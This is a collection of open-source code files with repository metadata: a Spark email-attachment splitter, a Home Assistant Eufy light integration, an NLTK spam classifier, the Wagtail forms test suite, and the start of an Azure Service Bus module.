print "INFO: Running with json filter {}.".format("enabled" if args.validate_json else "disabled")
filter_fn = partial(valid_json_filter, os.path.basename(__file__), lex_date, not args.validate_json)
conf = SparkConf().setAppName("Newman split attachments and emails")
sc = SparkContext(conf=conf)
rdd_emails = sc.textFile(args.input_emails_content_path).filter(filter_fn).map(lambda x: json.loads(x))
rdd_emails.map(removeAttachments).map(dump).saveAsTextFile(args.output_path_emails)
rdd_emails.flatMap(extractAttachments).map(dump).saveAsTextFile(args.output_path_raw_attachments)
|
{
"content_hash": "3bd1df51145ce8c51f45dae9529eb0e9",
"timestamp": "",
"source": "github",
"line_count": 83,
"max_line_length": 161,
"avg_line_length": 33.55421686746988,
"alnum_prop": 0.6434470377019749,
"repo_name": "Sotera/pst-extraction",
"id": "fe1814dc88069e65d37c870c638724429c4c553e",
"size": "2808",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "spark/attachment_split.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Clojure",
"bytes": "2178"
},
{
"name": "Java",
"bytes": "15069"
},
{
"name": "Python",
"bytes": "151392"
},
{
"name": "Scala",
"bytes": "7775"
},
{
"name": "Shell",
"bytes": "37462"
}
],
"symlink_target": ""
}
|
from __future__ import absolute_import
from Queue import *
|
{
"content_hash": "fd3a7a355720d9c819aef2b7fe935569",
"timestamp": "",
"source": "github",
"line_count": 3,
"max_line_length": 38,
"avg_line_length": 20,
"alnum_prop": 0.75,
"repo_name": "AbsoluteMSTR/pies",
"id": "8cd58f380da1b2154e25e8c3ba52947bac39a50e",
"size": "60",
"binary": false,
"copies": "3",
"ref": "refs/heads/develop",
"path": "pies2overrides/queue.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "31432"
},
{
"name": "Shell",
"bytes": "1169"
}
],
"symlink_target": ""
}
|
"""
Support for Eufy lights.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/light.eufy/
"""
import logging
from homeassistant.components.light import (
ATTR_BRIGHTNESS, ATTR_COLOR_TEMP, ATTR_HS_COLOR, SUPPORT_BRIGHTNESS,
SUPPORT_COLOR_TEMP, SUPPORT_COLOR, Light)
import homeassistant.util.color as color_util
from homeassistant.util.color import (
color_temperature_mired_to_kelvin as mired_to_kelvin,
color_temperature_kelvin_to_mired as kelvin_to_mired)
DEPENDENCIES = ['eufy']
_LOGGER = logging.getLogger(__name__)
EUFY_MAX_KELVIN = 6500
EUFY_MIN_KELVIN = 2700
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up Eufy bulbs."""
if discovery_info is None:
return
add_entities([EufyLight(discovery_info)], True)
class EufyLight(Light):
"""Representation of a Eufy light."""
def __init__(self, device):
"""Initialize the light."""
import lakeside
self._temp = None
self._brightness = None
self._hs = None
self._state = None
self._name = device['name']
self._address = device['address']
self._code = device['code']
self._type = device['type']
self._bulb = lakeside.bulb(self._address, self._code, self._type)
self._colormode = False
if self._type == "T1011":
self._features = SUPPORT_BRIGHTNESS
elif self._type == "T1012":
self._features = SUPPORT_BRIGHTNESS | SUPPORT_COLOR_TEMP
elif self._type == "T1013":
self._features = SUPPORT_BRIGHTNESS | SUPPORT_COLOR_TEMP | \
SUPPORT_COLOR
self._bulb.connect()
def update(self):
"""Synchronise state from the bulb."""
self._bulb.update()
if self._bulb.power:
self._brightness = self._bulb.brightness
self._temp = self._bulb.temperature
if self._bulb.colors:
self._colormode = True
self._hs = color_util.color_RGB_to_hs(*self._bulb.colors)
else:
self._colormode = False
self._state = self._bulb.power
@property
def unique_id(self):
"""Return the ID of this light."""
return self._address
@property
def name(self):
"""Return the name of the device if any."""
return self._name
@property
def is_on(self):
"""Return true if device is on."""
return self._state
@property
def brightness(self):
"""Return the brightness of this light between 0..255."""
return int(self._brightness * 255 / 100)
@property
def min_mireds(self):
"""Return minimum supported color temperature."""
return kelvin_to_mired(EUFY_MAX_KELVIN)
@property
def max_mireds(self):
"""Return maximu supported color temperature."""
return kelvin_to_mired(EUFY_MIN_KELVIN)
@property
def color_temp(self):
"""Return the color temperature of this light."""
temp_in_k = int(EUFY_MIN_KELVIN + (self._temp *
(EUFY_MAX_KELVIN - EUFY_MIN_KELVIN)
/ 100))
return kelvin_to_mired(temp_in_k)
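    # Example (illustrative): with the bulb reporting _temp == 50, temp_in_k
    # is 2700 + 50 * (6500 - 2700) / 100 = 4600 K, which kelvin_to_mired maps
    # to roughly 217 mireds (mired = 1,000,000 / kelvin).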
@property
def hs_color(self):
"""Return the color of this light."""
if not self._colormode:
return None
return self._hs
@property
def supported_features(self):
"""Flag supported features."""
return self._features
def turn_on(self, **kwargs):
"""Turn the specified light on."""
brightness = kwargs.get(ATTR_BRIGHTNESS)
colortemp = kwargs.get(ATTR_COLOR_TEMP)
# pylint: disable=invalid-name
hs = kwargs.get(ATTR_HS_COLOR)
if brightness is not None:
brightness = int(brightness * 100 / 255)
else:
if self._brightness is None:
self._brightness = 100
brightness = self._brightness
if colortemp is not None:
self._colormode = False
temp_in_k = mired_to_kelvin(colortemp)
relative_temp = temp_in_k - EUFY_MIN_KELVIN
temp = int(relative_temp * 100 /
(EUFY_MAX_KELVIN - EUFY_MIN_KELVIN))
else:
temp = None
        if hs is not None:
            # brightness was converted to the 0-100 scale above, which is
            # what color_hsv_to_RGB expects for the value channel.
            rgb = color_util.color_hsv_to_RGB(hs[0], hs[1], brightness)
            self._colormode = True
        elif self._colormode:
            rgb = color_util.color_hsv_to_RGB(
                self._hs[0], self._hs[1], brightness)
else:
rgb = None
try:
self._bulb.set_state(power=True, brightness=brightness,
temperature=temp, colors=rgb)
except BrokenPipeError:
self._bulb.connect()
self._bulb.set_state(power=True, brightness=brightness,
temperature=temp, colors=rgb)
def turn_off(self, **kwargs):
"""Turn the specified light off."""
try:
self._bulb.set_state(power=False)
except BrokenPipeError:
self._bulb.connect()
self._bulb.set_state(power=False)
|
{
"content_hash": "2c8093cd87892aadbf9514a09b64759c",
"timestamp": "",
"source": "github",
"line_count": 170,
"max_line_length": 78,
"avg_line_length": 31.405882352941177,
"alnum_prop": 0.5663982019104701,
"repo_name": "PetePriority/home-assistant",
"id": "7a44a58cd81d09e9a444d43fd92526668b651a2c",
"size": "5339",
"binary": false,
"copies": "3",
"ref": "refs/heads/dev",
"path": "homeassistant/components/eufy/light.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "1175"
},
{
"name": "Dockerfile",
"bytes": "1073"
},
{
"name": "Python",
"bytes": "13985647"
},
{
"name": "Ruby",
"bytes": "745"
},
{
"name": "Shell",
"bytes": "17364"
}
],
"symlink_target": ""
}
|
from nltk.classify import PositiveNaiveBayesClassifier
from detie.data import PickleData, DictData
def features(words):
return {char: True for char in words}
def train(spam_words, unlabeled_words):
spams = list(map(features, spam_words))
unlabeled = list(map(features, unlabeled_words))
model = PositiveNaiveBayesClassifier.train(spams, unlabeled, 0.5)
data = PickleData('bayesmodel.pickle')
data.write(model)
return model
def predictor():
data = PickleData('bayesmodel.pickle')
if data.exists:
model = data.read()
else:
model = retrain()
def classify(word):
pb = model.prob_classify(features(word))
return pb.prob(1) > 0.95
return classify
def retrain():
spams = DictData('spams.txt', encoding='utf8')
unlabeled = DictData('unlabeled.txt', encoding='utf8')
return train(spams.texts, unlabeled.texts)
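# Illustrative usage (assumes spams.txt and unlabeled.txt are present where
# DictData looks for them; the 0.95 threshold above decides spam):
#     is_spam = predictor()
#     is_spam(u'some suspicious word')  # True iff P(spam) > 0.95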
|
{
"content_hash": "82d7e77050e87577aa37a8864d893a46",
"timestamp": "",
"source": "github",
"line_count": 35,
"max_line_length": 69,
"avg_line_length": 25.8,
"alnum_prop": 0.6821705426356589,
"repo_name": "shanzi/detie",
"id": "63ad88665c17ff0a94bb8b83d5a8b3adc7f6c211",
"size": "903",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "detie/bayes.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "1372401"
}
],
"symlink_target": ""
}
|
from __future__ import absolute_import, unicode_literals
import json
from django import forms
from django.core import mail
from django.core.urlresolvers import reverse
from django.test import TestCase
from wagtail.tests.testapp.models import FormField, FormPage, JadeFormPage
from wagtail.tests.utils import WagtailTestUtils
from wagtail.wagtailcore.models import Page
from wagtail.wagtailforms.forms import FormBuilder
from wagtail.wagtailforms.models import FormSubmission
def make_form_page(**kwargs):
kwargs.setdefault('title', "Contact us")
kwargs.setdefault('slug', "contact-us")
kwargs.setdefault('to_address', "to@email.com")
kwargs.setdefault('from_address', "from@email.com")
kwargs.setdefault('subject', "The subject")
home_page = Page.objects.get(url_path='/home/')
form_page = home_page.add_child(instance=FormPage(**kwargs))
FormField.objects.create(
page=form_page,
sort_order=1,
label="Your email",
field_type='email',
required=True,
)
FormField.objects.create(
page=form_page,
sort_order=2,
label="Your message",
field_type='multiline',
required=True,
)
FormField.objects.create(
page=form_page,
sort_order=3,
label="Your choices",
field_type='checkboxes',
required=False,
choices='foo,bar,baz',
)
return form_page
class TestFormSubmission(TestCase):
def setUp(self):
# Create a form page
self.form_page = make_form_page()
def test_get_form(self):
response = self.client.get('/contact-us/')
# Check response
self.assertContains(response, """<label for="id_your-email">Your email</label>""")
self.assertTemplateUsed(response, 'tests/form_page.html')
self.assertTemplateNotUsed(response, 'tests/form_page_landing.html')
# check that variables defined in get_context are passed through to the template (#1429)
self.assertContains(response, "<p>hello world</p>")
def test_post_invalid_form(self):
response = self.client.post('/contact-us/', {
'your-email': 'bob',
'your-message': 'hello world',
'your-choices': ''
})
# Check response
self.assertContains(response, "Enter a valid email address.")
self.assertTemplateUsed(response, 'tests/form_page.html')
self.assertTemplateNotUsed(response, 'tests/form_page_landing.html')
def test_post_valid_form(self):
response = self.client.post('/contact-us/', {
'your-email': 'bob@example.com',
'your-message': 'hello world',
'your-choices': {'foo': '', 'bar': '', 'baz': ''}
})
# Check response
self.assertContains(response, "Thank you for your feedback.")
self.assertTemplateNotUsed(response, 'tests/form_page.html')
self.assertTemplateUsed(response, 'tests/form_page_landing.html')
# check that variables defined in get_context are passed through to the template (#1429)
self.assertContains(response, "<p>hello world</p>")
# Check that an email was sent
self.assertEqual(len(mail.outbox), 1)
self.assertEqual(mail.outbox[0].subject, "The subject")
self.assertIn("Your message: hello world", mail.outbox[0].body)
self.assertEqual(mail.outbox[0].to, ['to@email.com'])
self.assertEqual(mail.outbox[0].from_email, 'from@email.com')
# Check that form submission was saved correctly
form_page = Page.objects.get(url_path='/home/contact-us/')
self.assertTrue(FormSubmission.objects.filter(page=form_page, form_data__contains='hello world').exists())
def test_post_unicode_characters(self):
self.client.post('/contact-us/', {
'your-email': 'bob@example.com',
'your-message': 'こんにちは、世界',
'your-choices': {'foo': '', 'bar': '', 'baz': ''}
})
# Check the email
self.assertEqual(len(mail.outbox), 1)
self.assertIn("Your message: こんにちは、世界", mail.outbox[0].body)
# Check the form submission
submission = FormSubmission.objects.get()
submission_data = json.loads(submission.form_data)
self.assertEqual(submission_data['your-message'], 'こんにちは、世界')
def test_post_multiple_values(self):
response = self.client.post('/contact-us/', {
'your-email': 'bob@example.com',
'your-message': 'hello world',
'your-choices': {'foo': 'on', 'bar': 'on', 'baz': 'on'}
})
# Check response
self.assertContains(response, "Thank you for your feedback.")
self.assertTemplateNotUsed(response, 'tests/form_page.html')
self.assertTemplateUsed(response, 'tests/form_page_landing.html')
# Check that the three checkbox values were saved correctly
form_page = Page.objects.get(url_path='/home/contact-us/')
submission = FormSubmission.objects.filter(
page=form_page, form_data__contains='hello world'
)
self.assertIn("foo", submission[0].form_data)
self.assertIn("bar", submission[0].form_data)
self.assertIn("baz", submission[0].form_data)
def test_post_blank_checkbox(self):
response = self.client.post('/contact-us/', {
'your-email': 'bob@example.com',
'your-message': 'hello world',
'your-choices': {},
})
# Check response
self.assertContains(response, "Thank you for your feedback.")
self.assertTemplateNotUsed(response, 'tests/form_page.html')
self.assertTemplateUsed(response, 'tests/form_page_landing.html')
# Check that the checkbox was serialised in the email correctly
self.assertEqual(len(mail.outbox), 1)
self.assertIn("Your choices: None", mail.outbox[0].body)
class TestFormSubmissionWithMultipleRecipients(TestCase):
def setUp(self):
# Create a form page
self.form_page = make_form_page(to_address='to@email.com, another@email.com')
def test_post_valid_form(self):
response = self.client.post('/contact-us/', {
'your-email': 'bob@example.com',
'your-message': 'hello world',
'your-choices': {'foo': '', 'bar': '', 'baz': ''}
})
# Check response
self.assertContains(response, "Thank you for your feedback.")
self.assertTemplateNotUsed(response, 'tests/form_page.html')
self.assertTemplateUsed(response, 'tests/form_page_landing.html')
# check that variables defined in get_context are passed through to the template (#1429)
self.assertContains(response, "<p>hello world</p>")
# Check that one email was sent, but to two recipients
self.assertEqual(len(mail.outbox), 1)
self.assertEqual(mail.outbox[0].subject, "The subject")
self.assertIn("Your message: hello world", mail.outbox[0].body)
self.assertEqual(mail.outbox[0].from_email, 'from@email.com')
self.assertEqual(set(mail.outbox[0].to), {'to@email.com', 'another@email.com'})
# Check that form submission was saved correctly
form_page = Page.objects.get(url_path='/home/contact-us/')
self.assertTrue(FormSubmission.objects.filter(page=form_page, form_data__contains='hello world').exists())
class TestFormBuilder(TestCase):
def setUp(self):
# Create a form page
home_page = Page.objects.get(url_path='/home/')
self.form_page = home_page.add_child(instance=FormPage(
title="Contact us",
slug="contact-us",
to_address="to@email.com",
from_address="from@email.com",
subject="The subject",
))
FormField.objects.create(
page=self.form_page,
sort_order=1,
label="Your name",
field_type='singleline',
required=True,
)
FormField.objects.create(
page=self.form_page,
sort_order=2,
label="Your message",
field_type='multiline',
required=True,
)
FormField.objects.create(
page=self.form_page,
sort_order=2,
label="Your birthday",
field_type='date',
required=True,
)
FormField.objects.create(
page=self.form_page,
sort_order=2,
label="Your birthtime :)",
field_type='datetime',
required=True,
)
FormField.objects.create(
page=self.form_page,
sort_order=1,
label="Your email",
field_type='email',
required=True,
)
FormField.objects.create(
page=self.form_page,
sort_order=2,
label="Your homepage",
field_type='url',
required=True,
)
FormField.objects.create(
page=self.form_page,
sort_order=2,
label="Your favourite number",
field_type='number',
required=True,
)
FormField.objects.create(
page=self.form_page,
sort_order=2,
label="Your favourite Python IDEs",
field_type='dropdown',
required=True,
choices='PyCharm,vim,nano',
)
FormField.objects.create(
page=self.form_page,
sort_order=2,
label="Your favourite Python IDE",
help_text="Choose one",
field_type='radio',
required=True,
choices='PyCharm,vim,nano',
)
FormField.objects.create(
page=self.form_page,
sort_order=3,
label="Your choices",
field_type='checkboxes',
required=False,
choices='foo,bar,baz',
)
FormField.objects.create(
page=self.form_page,
sort_order=3,
label="I agree to the Terms of Use",
field_type='checkbox',
required=True,
)
# Create a form builder
self.fb = FormBuilder(self.form_page.form_fields.all())
def test_fields(self):
"""
This tests that all fields were added to the form with the correct types
"""
form_class = self.fb.get_form_class()
# All fields are present in form
field_names = form_class.base_fields.keys()
self.assertIn('your-name', field_names)
self.assertIn('your-message', field_names)
self.assertIn('your-birthday', field_names)
self.assertIn('your-birthtime', field_names)
self.assertIn('your-email', field_names)
self.assertIn('your-homepage', field_names)
self.assertIn('your-favourite-number', field_names)
self.assertIn('your-favourite-python-ides', field_names)
self.assertIn('your-favourite-python-ide', field_names)
self.assertIn('your-choices', field_names)
self.assertIn('i-agree-to-the-terms-of-use', field_names)
# All fields have proper type
self.assertIsInstance(form_class.base_fields['your-name'], forms.CharField)
self.assertIsInstance(form_class.base_fields['your-message'], forms.CharField)
self.assertIsInstance(form_class.base_fields['your-birthday'], forms.DateField)
self.assertIsInstance(form_class.base_fields['your-birthtime'], forms.DateTimeField)
self.assertIsInstance(form_class.base_fields['your-email'], forms.EmailField)
self.assertIsInstance(form_class.base_fields['your-homepage'], forms.URLField)
self.assertIsInstance(form_class.base_fields['your-favourite-number'], forms.DecimalField)
self.assertIsInstance(form_class.base_fields['your-favourite-python-ides'], forms.ChoiceField)
self.assertIsInstance(form_class.base_fields['your-favourite-python-ide'], forms.ChoiceField)
self.assertIsInstance(form_class.base_fields['your-choices'], forms.MultipleChoiceField)
self.assertIsInstance(form_class.base_fields['i-agree-to-the-terms-of-use'], forms.BooleanField)
# Some fields have non-default widgets
self.assertIsInstance(form_class.base_fields['your-message'].widget, forms.Textarea)
self.assertIsInstance(form_class.base_fields['your-favourite-python-ide'].widget, forms.RadioSelect)
self.assertIsInstance(form_class.base_fields['your-choices'].widget, forms.CheckboxSelectMultiple)
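    # Illustrative sketch (not part of the original tests): the generated form
    # class behaves like any Django form, so invalid data surfaces per-field
    # errors keyed by the slugified labels checked above.
    #
    #     form = form_class(data={'your-name': 'Bob'})  # most fields missing
    #     assert not form.is_valid()
    #     assert 'your-message' in form.errors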
class TestFormsIndex(TestCase):
fixtures = ['test.json']
def setUp(self):
self.assertTrue(self.client.login(username='siteeditor', password='password'))
self.form_page = Page.objects.get(url_path='/home/contact-us/')
def make_form_pages(self):
"""
This makes 100 form pages and adds them as children to 'contact-us'
This is used to test pagination on the forms index
"""
for i in range(100):
self.form_page.add_child(instance=FormPage(
title="Form " + str(i),
slug='form-' + str(i),
live=True
))
def test_forms_index(self):
response = self.client.get(reverse('wagtailforms:index'))
# Check response
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'wagtailforms/index.html')
def test_forms_index_pagination(self):
# Create some more form pages to make pagination kick in
self.make_form_pages()
# Get page two
response = self.client.get(reverse('wagtailforms:index'), {'p': 2})
# Check response
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'wagtailforms/index.html')
# Check that we got the correct page
self.assertEqual(response.context['form_pages'].number, 2)
def test_forms_index_pagination_invalid(self):
# Create some more form pages to make pagination kick in
self.make_form_pages()
        # Request a non-numeric page number
response = self.client.get(reverse('wagtailforms:index'), {'p': 'Hello world!'})
# Check response
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'wagtailforms/index.html')
# Check that it got page one
self.assertEqual(response.context['form_pages'].number, 1)
def test_forms_index_pagination_out_of_range(self):
# Create some more form pages to make pagination kick in
self.make_form_pages()
        # Request a page number beyond the last page
response = self.client.get(reverse('wagtailforms:index'), {'p': 99999})
# Check response
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'wagtailforms/index.html')
# Check that it got the last page
self.assertEqual(response.context['form_pages'].number, response.context['form_pages'].paginator.num_pages)
def test_cannot_see_forms_without_permission(self):
        # Login as a user without permission to see forms
self.assertTrue(self.client.login(username='eventeditor', password='password'))
response = self.client.get(reverse('wagtailforms:index'))
# Check that the user cannot see the form page
self.assertFalse(self.form_page in response.context['form_pages'])
def test_can_see_forms_with_permission(self):
response = self.client.get(reverse('wagtailforms:index'))
# Check that the user can see the form page
self.assertIn(self.form_page, response.context['form_pages'])
class TestFormsSubmissions(TestCase, WagtailTestUtils):
def setUp(self):
# Create a form page
self.form_page = make_form_page()
# Add a couple of form submissions
old_form_submission = FormSubmission.objects.create(
page=self.form_page,
form_data=json.dumps({
'your-email': "old@example.com",
'your-message': "this is a really old message",
}),
)
old_form_submission.submit_time = '2013-01-01T12:00:00.000Z'
old_form_submission.save()
new_form_submission = FormSubmission.objects.create(
page=self.form_page,
form_data=json.dumps({
'your-email': "new@example.com",
'your-message': "this is a fairly new message",
}),
)
new_form_submission.submit_time = '2014-01-01T12:00:00.000Z'
new_form_submission.save()
# Login
self.login()
def make_list_submissions(self):
"""
This makes 100 submissions to test pagination on the forms submissions page
"""
for i in range(100):
submission = FormSubmission(
page=self.form_page,
form_data=json.dumps({
'hello': 'world'
})
)
submission.save()
def test_list_submissions(self):
response = self.client.get(reverse('wagtailforms:list_submissions', args=(self.form_page.id, )))
# Check response
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'wagtailforms/index_submissions.html')
self.assertEqual(len(response.context['data_rows']), 2)
def test_list_submissions_filtering_date_from(self):
response = self.client.get(
reverse('wagtailforms:list_submissions', args=(self.form_page.id, )), {'date_from': '01/01/2014'}
)
# Check response
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'wagtailforms/index_submissions.html')
self.assertEqual(len(response.context['data_rows']), 1)
def test_list_submissions_filtering_date_to(self):
response = self.client.get(
reverse('wagtailforms:list_submissions', args=(self.form_page.id, )), {'date_to': '12/31/2013'}
)
# Check response
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'wagtailforms/index_submissions.html')
self.assertEqual(len(response.context['data_rows']), 1)
def test_list_submissions_filtering_range(self):
response = self.client.get(
reverse('wagtailforms:list_submissions', args=(self.form_page.id, )),
{'date_from': '12/31/2013', 'date_to': '01/02/2014'}
)
# Check response
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'wagtailforms/index_submissions.html')
self.assertEqual(len(response.context['data_rows']), 1)
def test_list_submissions_pagination(self):
self.make_list_submissions()
response = self.client.get(reverse('wagtailforms:list_submissions', args=(self.form_page.id, )), {'p': 2})
# Check response
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'wagtailforms/index_submissions.html')
# Check that we got the correct page
self.assertEqual(response.context['submissions'].number, 2)
def test_list_submissions_pagination_invalid(self):
self.make_list_submissions()
response = self.client.get(
reverse('wagtailforms:list_submissions', args=(self.form_page.id, )), {'p': 'Hello World!'}
)
# Check response
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'wagtailforms/index_submissions.html')
# Check that we got page one
self.assertEqual(response.context['submissions'].number, 1)
def test_list_submissions_pagination_out_of_range(self):
self.make_list_submissions()
response = self.client.get(reverse('wagtailforms:list_submissions', args=(self.form_page.id, )), {'p': 99999})
# Check response
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'wagtailforms/index_submissions.html')
# Check that we got the last page
self.assertEqual(response.context['submissions'].number, response.context['submissions'].paginator.num_pages)
def test_list_submissions_csv_export(self):
response = self.client.get(
reverse('wagtailforms:list_submissions', args=(self.form_page.id,)),
{'action': 'CSV'}
)
# Check response
self.assertEqual(response.status_code, 200)
data_lines = response.content.decode().split("\n")
self.assertEqual(data_lines[0], 'Submission date,Your email,Your message,Your choices\r')
self.assertEqual(data_lines[1], '2013-01-01 12:00:00+00:00,old@example.com,this is a really old message,None\r')
self.assertEqual(data_lines[2], '2014-01-01 12:00:00+00:00,new@example.com,this is a fairly new message,None\r')
def test_list_submissions_csv_export_with_date_from_filtering(self):
response = self.client.get(
reverse('wagtailforms:list_submissions', args=(self.form_page.id,)),
{'action': 'CSV', 'date_from': '01/01/2014'}
)
# Check response
self.assertEqual(response.status_code, 200)
data_lines = response.content.decode().split("\n")
self.assertEqual(data_lines[0], 'Submission date,Your email,Your message,Your choices\r')
self.assertEqual(data_lines[1], '2014-01-01 12:00:00+00:00,new@example.com,this is a fairly new message,None\r')
def test_list_submissions_csv_export_with_date_to_filtering(self):
response = self.client.get(
reverse('wagtailforms:list_submissions', args=(self.form_page.id,)),
{'action': 'CSV', 'date_to': '12/31/2013'}
)
# Check response
self.assertEqual(response.status_code, 200)
data_lines = response.content.decode().split("\n")
self.assertEqual(data_lines[0], 'Submission date,Your email,Your message,Your choices\r')
self.assertEqual(data_lines[1], '2013-01-01 12:00:00+00:00,old@example.com,this is a really old message,None\r')
def test_list_submissions_csv_export_with_range_filtering(self):
response = self.client.get(
reverse('wagtailforms:list_submissions', args=(self.form_page.id,)),
{'action': 'CSV', 'date_from': '12/31/2013', 'date_to': '01/02/2014'}
)
# Check response
self.assertEqual(response.status_code, 200)
data_lines = response.content.decode().split("\n")
self.assertEqual(data_lines[0], 'Submission date,Your email,Your message,Your choices\r')
self.assertEqual(data_lines[1], '2014-01-01 12:00:00+00:00,new@example.com,this is a fairly new message,None\r')
def test_list_submissions_csv_export_with_unicode_in_submission(self):
unicode_form_submission = FormSubmission.objects.create(
page=self.form_page,
form_data=json.dumps({
'your-email': "unicode@example.com",
'your-message': 'こんにちは、世界',
}),
)
unicode_form_submission.submit_time = '2014-01-02T12:00:00.000Z'
unicode_form_submission.save()
response = self.client.get(
reverse('wagtailforms:list_submissions', args=(self.form_page.id, )),
{'date_from': '01/02/2014', 'action': 'CSV'}
)
# Check response
self.assertEqual(response.status_code, 200)
data_line = response.content.decode('utf-8').split("\n")[1]
self.assertIn('こんにちは、世界', data_line)
def test_list_submissions_csv_export_with_unicode_in_field(self):
FormField.objects.create(
page=self.form_page,
sort_order=2,
label="Выберите самую любимую IDE для разработке на Python",
help_text="Вы можете выбрать только один вариант",
field_type='radio',
required=True,
choices='PyCharm,vim,nano',
)
unicode_form_submission = FormSubmission.objects.create(
page=self.form_page,
form_data=json.dumps({
'your-email': "unicode@example.com",
'your-message': "We don\'t need unicode here",
'vyberite-samuiu-liubimuiu-ide-dlia-razrabotke-na-python': "vim",
}),
)
unicode_form_submission.submit_time = '2014-01-02T12:00:00.000Z'
unicode_form_submission.save()
response = self.client.get(
reverse('wagtailforms:list_submissions', args=(self.form_page.id, )),
{'date_from': '01/02/2014', 'action': 'CSV'}
)
# Check response
self.assertEqual(response.status_code, 200)
data_lines = response.content.decode('utf-8').split("\n")
self.assertIn('Выберите самую любимую IDE для разработке на Python', data_lines[0])
self.assertIn('vim', data_lines[1])
class TestDeleteFormSubmission(TestCase):
fixtures = ['test.json']
def setUp(self):
self.assertTrue(self.client.login(username='siteeditor', password='password'))
self.form_page = Page.objects.get(url_path='/home/contact-us/')
    def test_delete_submission_show_confirmation(self):
response = self.client.get(reverse(
'wagtailforms:delete_submission',
args=(self.form_page.id, FormSubmission.objects.first().id)
))
        # Check that the confirmation page is shown when the HTTP method is GET
self.assertTemplateUsed(response, 'wagtailforms/confirm_delete.html')
# Check that the deletion has not happened with GET request
self.assertEqual(FormSubmission.objects.count(), 2)
def test_delete_submission_with_permissions(self):
response = self.client.post(reverse(
'wagtailforms:delete_submission',
args=(self.form_page.id, FormSubmission.objects.first().id)
))
# Check that the submission is gone
self.assertEqual(FormSubmission.objects.count(), 1)
# Should be redirected to list of submissions
self.assertRedirects(response, reverse("wagtailforms:list_submissions", args=(self.form_page.id, )))
def test_delete_submission_bad_permissions(self):
self.assertTrue(self.client.login(username="eventeditor", password="password"))
response = self.client.post(reverse(
'wagtailforms:delete_submission',
args=(self.form_page.id, FormSubmission.objects.first().id)
))
        # Check that the user received a 403 response
self.assertEqual(response.status_code, 403)
# Check that the deletion has not happened
self.assertEqual(FormSubmission.objects.count(), 2)
class TestIssue798(TestCase):
fixtures = ['test.json']
def setUp(self):
self.assertTrue(self.client.login(username='siteeditor', password='password'))
self.form_page = Page.objects.get(url_path='/home/contact-us/').specific
# Add a number field to the page
FormField.objects.create(
page=self.form_page,
label="Your favourite number",
field_type='number',
)
def test_post(self):
response = self.client.post('/contact-us/', {
'your-email': 'bob@example.com',
'your-message': 'hello world',
'your-choices': {'foo': '', 'bar': '', 'baz': ''},
'your-favourite-number': '7.3',
})
# Check response
self.assertTemplateUsed(response, 'tests/form_page_landing.html')
# Check that form submission was saved correctly
self.assertTrue(FormSubmission.objects.filter(page=self.form_page, form_data__contains='7.3').exists())
class TestIssue585(TestCase):
fixtures = ['test.json']
def setUp(self):
self.assertTrue(self.client.login(username='superuser', password='password'))
# Find root page
self.root_page = Page.objects.get(id=2)
def test_adding_duplicate_form_labels(self):
post_data = {
'title': "Form page!",
'content': "Some content",
'slug': 'contact-us',
'form_fields-TOTAL_FORMS': '3',
'form_fields-INITIAL_FORMS': '3',
'form_fields-MIN_NUM_FORMS': '0',
'form_fields-MAX_NUM_FORMS': '1000',
'form_fields-0-id': '',
'form_fields-0-label': 'foo',
'form_fields-0-field_type': 'singleline',
'form_fields-1-id': '',
'form_fields-1-label': 'foo',
'form_fields-1-field_type': 'singleline',
'form_fields-2-id': '',
'form_fields-2-label': 'bar',
'form_fields-2-field_type': 'singleline',
}
response = self.client.post(
reverse('wagtailadmin_pages:add', args=('tests', 'formpage', self.root_page.id)), post_data
)
self.assertEqual(response.status_code, 200)
self.assertContains(
response,
text="There is another field with the label foo, please change one of them.",
)
class TestNonHtmlExtension(TestCase):
fixtures = ['test.json']
def test_non_html_extension(self):
form_page = JadeFormPage(title="test")
self.assertEqual(form_page.landing_page_template, "tests/form_page_landing.jade")
|
{
"content_hash": "100ee126a8d0ded3daf40e2e2e096186",
"timestamp": "",
"source": "github",
"line_count": 760,
"max_line_length": 120,
"avg_line_length": 38.71184210526316,
"alnum_prop": 0.6175520886441658,
"repo_name": "kurtrwall/wagtail",
"id": "962f071967588f1f9d736732077e882808f1dac1",
"size": "29627",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "wagtail/wagtailforms/tests.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "175780"
},
{
"name": "HTML",
"bytes": "300701"
},
{
"name": "JavaScript",
"bytes": "122930"
},
{
"name": "Makefile",
"bytes": "685"
},
{
"name": "Python",
"bytes": "2527012"
},
{
"name": "Shell",
"bytes": "7240"
}
],
"symlink_target": ""
}
|
#-------------------------------------------------------------------------
# Copyright (c) Microsoft. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#--------------------------------------------------------------------------
import datetime
import os
import time
import json
import requests
from azure.common import (
AzureHttpError,
)
from .constants import (
AZURE_SERVICEBUS_NAMESPACE,
AZURE_SERVICEBUS_ACCESS_KEY,
AZURE_SERVICEBUS_ISSUER,
DEFAULT_HTTP_TIMEOUT,
SERVICE_BUS_HOST_BASE,
